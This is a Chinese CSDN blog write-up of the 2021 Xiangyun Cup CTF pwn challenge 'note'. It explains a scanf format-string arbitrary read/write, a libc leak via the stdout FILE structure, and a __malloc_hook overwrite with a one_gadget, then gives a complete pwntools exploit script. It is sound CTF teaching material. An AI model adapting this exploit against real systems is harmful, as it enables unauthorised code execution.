2021 祥云杯 pwn-note

最新推荐文章于 2023-02-01 12:51:58 发布
最新推荐文章于 2023-02-01 12:51:58 发布
阅读量383 收藏
点赞数 1
分类专栏: wp 文章标签: pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zzq487782568/article/details/127326594
版权

2021 祥云杯 pwn-note

这是一道scanf任意读写的pwn题
在这里插入图片描述
漏洞点发生在上图

在第一个图那里下个断点,查看stack时发现%11$p这里有一个stdout,这个给了我们泄露libc的机会,我们可以打stdout的flag和write_ptr,具体的可以看别的师傅对stdout泄露libc分析的文章
拿到libc之后,算出ogg,ogg出来了,可以再利用scanf任意地址写打malloc为ogg。

偏移为7, 这里笔者用的ubuntu20.04的2.31libc做的,不需要利用realloc来调整可以直接利用,题目给的libc需要利用realloc来调整一下即可。

from pwn import *

context(arch='amd64', os='linux', log_level='debug')

file_name = './note'

li = lambda x : print('\x1b[01;38;5;214m' + x + '\x1b[0m')
ll = lambda x : print('\x1b[01;38;5;1m' + x + '\x1b[0m')

context.terminal = ['tmux','splitw','-h']

debug = 0
if debug:
    r = remote()
else:
    r = process(file_name)

elf = ELF(file_name)

def dbg():
    gdb.attach(r)

menu = 'choice:'

def add(size, content):
    r.sendlineafter(menu, '1')
    r.sendlineafter('size: ', str(size))
    r.sendafter('content: ', content)

def show():
    r.sendlineafter(menu, '3')

def say(note1, note2):
    r.sendlineafter(menu, '2')
    r.sendafter('say ? ', note1)
    r.sendlineafter('? ', note2)

p1 = b'%11$s'
p2 = p64(0xfbad1800) + p64(0) * 3
say(p1, p2)

_IO_2_1_stdin_ = u64(r.recvuntil('\x7f')[-6:].ljust(8, b'\x00'))
li('_IO_2_1_stdin_ = ' + hex(_IO_2_1_stdin_))

libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
libc_base = _IO_2_1_stdin_ - libc.sym['_IO_2_1_stdin_']
li('libc_base = ' + hex(libc_base))

malloc_hook = libc_base + libc.sym['__malloc_hook']
li('malloc_hook = ' + hex(malloc_hook))

realloc_hook = libc_base + libc.sym['__realloc_hook']
li('realloc_hook = ' + hex(realloc_hook))

one = [0xe3afe, 0xe3b01, 0xe3b04]
one_gadget = libc_base + one[1]

p3 = b'%7$saaaa' + p64(malloc_hook)
p4 = p64(one_gadget)
say(p3, p4)

r.sendline('1')

r.interactive()

在这里插入图片描述

z1r0.
关注
专栏目录
CSAWCTF-2018-pwn-shellcode|CSAWCTF-2018-pwn-shellcode
12-10
CSAWCTF 2018年pwn题 shellcode 变形shellcode练手题目,该题目主要是利用三个节点来注入shellcode,考验解题人对shellcode的熟悉程度。题解:https://blog.csdn.net/A951860555/article/details/110350773
[BUGKU] [PWN] PWN5
Stan冲冲冲
05-18 421
[BUGKU] [PWN] PWN5 先下载文件,拉入UBUNTU,checksec检查一下 checksec human 架构是amd64,并开启了NX(堆栈可执行,16进制地址后六位不变,其余运行一次都会变) 在windows里把pwn2拉入64位ida 按F5切换到伪C 发现乱码,修改配置文件后ALT+A全部选上UTF-8,再按一次F5,中文就可以显示了 int __cdecl main(int argc, const char **argv, const char **envp) { char
2022柏鹭pwn复现
m0_63437215的博客
11-19 1375
2022柏鹭pwn
第二届“祥云pwn_note
孤勇傻兔的博客
12-23 1666
这题是格式化字符串漏洞 + House Of Orange + __malloc_hook 组合利用,难度倒也不是很难,对于我这种新手学到了不少东西。 但是我觉得这里并不是的格式化字符串漏洞,倒不如说是故意构造的逻辑漏洞,姑且称它为格式化字符串漏洞吧。 思路: house of orange:通过修改 top chunk 的 size,来触发 brk 扩展堆段,之后原有的 top chunk 会被置于 unsorted bin 中。本题再直接 show 泄露 main_arena 计算偏移得到 libc。
pwn2021 祥云 (部分)
woodwhale的博客
10-07 4232
pwn2021 祥云 (部分) 前言 国庆的最后几天,一直在补题,发现祥云那个时候一道堆题都不会,直接开始补题。 补题过程中,发现自己还是太菜了,对着师傅们的wp都有些不明白.jpg 1、note 这应该是祥云里最简单的题目了QAQ。但是之前没有学过IO,参考一位师傅写的这篇博客,pwn题堆利用的一些姿势 – IO_FILE 漏洞点在于scanf的格式化字符串,可以任意位置写。发现stack中有_IO_2_1_stdout_那么,我们写入p64(0xfbad1800) + p64(0)*3来泄露
2022蓝帽pwn初赛wp
N1rvana的博客
07-10 514
2022蓝帽pwn wp
2021-鹏城实验室-pwn-babyheap.zip
09-28
在本文中,我们将深入探讨2021年鹏城实验室的"Pwn-BabyHeap"挑战,这是一道涉及二进制安全和pwn技术的竞赛题目。本题主要考察了"off-by-null"漏洞的利用,这是一个在C语言编程中常见的安全问题。我们将围绕这个主题...
2021年“绿城”网络安全大赛
09-30
2021年“绿城”网络安全大赛是一场聚焦网络安全技术的竞技活动,旨在提升参赛者在信息安全领域的专业技能,增强社会对网络安全的重视。CTF(Capture The Flag)是网络安全竞赛的一种形式,参赛团队通过解决一系列...
gris-treinamentos-pwn-2021
03-31
gris-treinamentos-pwn-2021 幻灯片浏览器
OGG 使用pump进程配置复制
Dillon Oracle博客
08-28 2187
[root@source ~]# su - oracle [oracle@source ~]$ cd /u01/app/gg/ [oracle@source gg]$ ggsci   Oracle GoldenGate Command Interpreter for Oracle Version 11.2.1.0.1 OGGCORE_11.2.1.0.1_PLATFORMS_120
2021 祥云 pwn note
yongbaoii的博客
08-30 344
保护全开 功能1 可以申请chunk,然后会给chunk地址。 功能2 功能2有一个scanf的任意写。 功能3是一个输出。 利用的就是scanf的任意写。 我们知道scanf会把我们的输入的字符串当成第一个参数,如果还有需要,会先从五个寄存器去找,然后再去找栈中的数据,那我们也去看一下寄存器或者栈上的数据有没有可以利用的。 偏移8的地方显然有一个_IO_2_1_stdout_地址,所以我们可以把他当作参数做一个任意写,劫持_IO_FILE然后泄露libc,再来一次把malloc_hook地址写上去,
2022 网信柏鹭 pwn2 note2
z1r0的博客
09-17 685
因2.34之后取消了malloc,free hook这两个在堆pwn中用的最多的hook,roderick师傅分享的house of apple学习了一下,是一个非常好用的调用链,包括house of emma, house of kiwi, house of banana, house of pig, house of cat都是极好的调用链,前天的网信柏鹭里的pwn2是2.35的,笔者学完apple之后这里拿的2.34做的,只需要改偏移就可以打通2.35的。
攻防世界pwnnote-service
qq_42728977的博客
01-09 890
写在前面:最近在准备期末考试,姑且是这个理由吧,pwn和re都停了一个月了,感觉自己不够持之以恒,本来说还得一天一道题,给搁置了一个多月了,pwn和re这东西,不进则退,搞得我很难受,本来想的是,这个学期有点成绩,但是现在看来才是刚入门,而且还要复习考研,时间和精力会更少。喜欢pwn和re是因为自己很喜欢从原理搞清楚一个事情。不多啰嗦了,开始写wp了。 题目:note-service 原题是CIS...
Hgame-2023(前三周pwn题解)
weixin_73290593的博客
02-01 1235
hgame,真好玩
CISCN PWN签到题 task_note_service
Bill
05-02 1681
序言 比赛中这道差那么一点点就做出来了 程序运行 1.menu ---------menu--------- 1. add note 2. show note 3. edit note 4. del note 5. exit your choice>> 2. add 1. add note 2. show note 3. edit note 4. del...
pwn_note
fa1lr4in的小博客
02-11 283
gcc -m32 -g -save-temps hello.c           //生成hello.i,hello.s,hello.o readelf -h hello.o                                    //读取文件头 c = 预编译 汇编 elf (重定位)a.out objdump -d hello                          ...
hacknote--PWN的堆入门
Jason_ZhouYetao的博客
02-24 1237
第一步还是进行逆向的功能分析,顺便观察有无敏感函数,诸如:/bin/sh、cat flag等等   看了看发现还真的有,那这个题目就大大得简化了,接下来进行进一步的逆向分析:   add_note: unsigned int add_note() { _DWORD *v0; // ebx signed int i; // [esp+Ch] [ebp-1Ch] int siz...
(攻防世界)(pwn)hacknote
PLpa的博客
07-31 3434
use after free 堆!堆!堆! 终于对堆的结构有了一定的了解,开始做堆的题目,恰巧攻防世界xctf中有这么一题可以练练手,还是挺不错的。。。 对于use after free呢,这里有ctf-wiki的学习资料:https://ctf-wiki.github.io/ctf-wiki/pwn/linux/glibc-heap/use_after_free-zh/ 写的非常详细,很实用...
攻防世界pwn-forgot
最新发布
08-10
很抱歉,但是我无法回答你的问题。我只能提供关于麦田怪圈的信息。123 #### 引用[.reference_title] - *1* [攻防世界pwn题:forgot](https://blog.csdn.net/m0_62396648/article/details/125134327)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT0_1"}} ] [.reference_item] - *2* *3* [攻防世界:PWN刷题-forgot](https://blog.csdn.net/m0_53932372/article/details/122244244)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT0_1"}} ] [.reference_item] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

z1r0.

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值